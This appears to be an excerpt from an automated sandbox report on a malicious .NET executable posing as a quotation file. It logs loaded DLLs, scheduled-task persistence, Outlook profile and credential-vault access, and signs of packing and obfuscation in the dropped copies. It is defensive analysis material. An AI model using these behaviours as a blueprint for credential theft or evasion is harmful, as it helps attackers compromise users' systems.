                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: rQuotation3200025006.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: rQuotation3200025006.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: rQuotation3200025006.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rQuotation3200025006.exe.4fb0000.4.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rQuotation3200025006.exe.26e8b6c.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, KHpWQ0SIuHGDwagjf6.cs.Net Code: ouhZd92ZvS System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BBFC58 pushfd ; retf 0_2_04BBFC5A
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BB1888 pushad ; retf 0_2_04BB1889
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_06CC4710 push eax; retf 0_2_06CC4711
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_06CC7B85 push FFFFFF8Bh; iretd 0_2_06CC7B87
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_06CC4B83 pushad ; iretd 0_2_06CC4B85
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 9_2_06AC5168 pushad ; iretd 9_2_06AC5169
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 9_2_06AC6F2D push FFFFFF8Bh; iretd 9_2_06AC6F2F
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_018CF8E8 pushad ; retf 14_2_018CF8F1
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_018C0C55 push edi; retf 14_2_018C0C7A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_066D6F2D push FFFFFF8Bh; iretd 16_2_066D6F2F
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_066D5168 pushad ; iretd 16_2_066D5169
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_05426105 push esi; iretd 25_2_05426106
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_07276E6D push FFFFFF8Bh; iretd 25_2_07276E6F
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_032CF7C8 pushad ; retf 28_2_032CF7D1
                    Source: rQuotation3200025006.exeStatic PE information: section name: .text entropy: 7.946103748533992
                    Source: pBBqGOzrz.exe.0.drStatic PE information: section name: .text entropy: 7.946103748533992
                    Source: 0.2.rQuotation3200025006.exe.4fb0000.4.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                    Source: 0.2.rQuotation3200025006.exe.26e8b6c.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, wMS4Kp4PS7QXLDwFba.csHigh entropy of concatenated method names: 'GPa0KfIwhl', 's1L0kRMuS2', 'NEI0Rp8qmY', 'hEA0DmCcjC', 'Qs105gGPF0', 'JoT0cSEOwq', 'gs70OQEa2N', 'jv80LkQslm', 'KTw0Un7g5y', 'twv0wQKHVw'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, TAKKyQpcGnSdH0xi7T.csHigh entropy of concatenated method names: 'AMbquEdkgh', 'EN9qXGFR8O', 'b7MqybfdBC', 'eiXyPfVVIK', 'E30yzTD3u3', 'sYqqGSICpi', 'aHFqBwBv5b', 'WRUqVlu65H', 'AnLqrBxRG2', 'CEhqZ0721q'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, nKwRxOEJXPmCwrdxu7.csHigh entropy of concatenated method names: 'KVWdThSED', 'GdpYV7TKo', 'QoMo7s1Zs', 'JUxAwQhTZ', 'nqYk6UE8P', 'JdYvn4hiY', 'EAGGHqd9EgXB7jraa8', 'vQE8wR5IQhYq0hC6yX', 'MX5e7sotc', 'gTZ1nvpE6'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, GJOr6KCN4jXCBadg9n.csHigh entropy of concatenated method names: 'c4jyjxpgId', 'DX8yIAX1Xv', 'xDNyQ6d15x', 'c5UyqjLpqH', 'WqkyH0jGM2', 'JtGQ3jArKF', 'fYIQhtaP47', 'ysvQEBTbma', 'QEpQtjKGlE', 'w2GQis3dFf'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, JSvpK7PbC3ADjp6YBha.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LAp1FZm3Yj', 'dg41MWYkhc', 'NEI14RQHmh', 'BKY1snDrQ8', 'CEZ13BkKip', 'aCc1hRVQ9Y', 'GJ31Eu0yvO'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, daS1DKPWJeoLefLlWoA.csHigh entropy of concatenated method names: 'zbZpgL6Hjl', 'Nyhplswj0a', 'hZmpdVGxGR', 'tSNpYeuwV5', 'EhUpJ4F0JR', 'F3Tpob1PSo', 'ksspAeJCEO', 'cjDpKwsZn5', 'hcypkSTjYV', 'NXmpvFlKmU'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, PyH0ExoJb7qhW6t6e0.csHigh entropy of concatenated method names: 'tX0ntVYDlc', 'AXSnPSNe1P', 'ampeGI5mjS', 'WULeBcKmJQ', 'jtjnwZ2ZG6', 'LaQn6GfHox', 'gWKnbAHOHS', 'veunFBgDBM', 'MHlnMRBX8h', 'dexn4ZuktS'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, KHpWQ0SIuHGDwagjf6.csHigh entropy of concatenated method names: 'liirjhkj6a', 'cNhru5avY3', 'Gn6rIVUWn3', 'RgjrX9Jjha', 'F2vrQXJYMk', 'xytryolMZP', 'yggrqi1E0k', 'TWArH3TW69', 'FZIraDZIYt', 'wifr8NpYFs'
